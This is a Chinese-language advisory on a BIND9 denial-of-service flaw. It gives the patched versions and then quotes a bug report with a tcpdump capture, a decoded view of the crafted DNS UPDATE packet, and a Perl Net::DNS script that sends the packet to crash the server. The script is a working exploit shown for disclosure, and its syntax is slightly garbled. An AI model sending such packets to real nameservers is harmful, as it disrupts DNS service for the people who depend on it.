BIND高危漏洞
2010-08-10
影响所有 bind9本版: 已经解决次问题的BIND版本: Upgrade BIND to one of 9.4.3-P3, 9.5.1-P3 or 9.6.1-P1. These versions can be downloaded from: http://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz http://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz http://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz 攻击代码:
Package: bind9
Severity: normal
bind can be crashed with an update packet:
Packet in tcpdump:
15:38:11.676045 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53: 17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain]
Another view of the Packet:
| ;; HEADER SECTION
| ;; id = 181
| ;; qr = 0 opcode = UPDATE rcode = NOERROR
| ;; zocount = 1 prcount = 1 upcount = 1 adcount = 1
|
| ;; ZONE SECTION (1 record)
| ;; 8.0.10.in-addr.arpa. IN SOA
|
| ;; PREREQUISITE SECTION (1 record)
| 4.8.0.10.in-addr.arpa. 0 IN ANY ; no data
|
| ;; UPDATE SECTION (1 record)
| 4.8.0.10.in-addr.arpa. 0 ANY ANY ; no data
|
| ;; ADDITIONAL SECTION (1 record)
| office.example.com. 0 ANY TSIG HMAC-MD5.SIG-ALG.REG.INT. NOERROR
Such a packet can be created with perl:
-----------------
#!/usr/bin/perl -w
use Net::DNS;
our $NSI = '';
our $NSI_KEY_NAME = '';
our $NSI_KEY = '';
my $rzone = '';
my $rptr = "1.$rzone";
my $packet = Net::DNS::Update->new($rzone);
$packet->push(
pre = Net::DNS::RR->new(
Name = $rptr,
Class = 'IN',
Type = 'ANY',
TTL = 0,
)
);
$packet->push(
update = Net::DNS::RR->new(
Name = $rptr,
Class = 'ANY',
Type = 'ANY',
)
);
$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;
print $packet->string;
Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);
--------------------
bind only crashes, if the used fqdn exists on the nameserver.
-- System Information:
Debian Release: 5.0.2
APT prefers proposed-updates
APT policy: (500, 'proposed-updates'), (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 2.6.26-1-xen-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash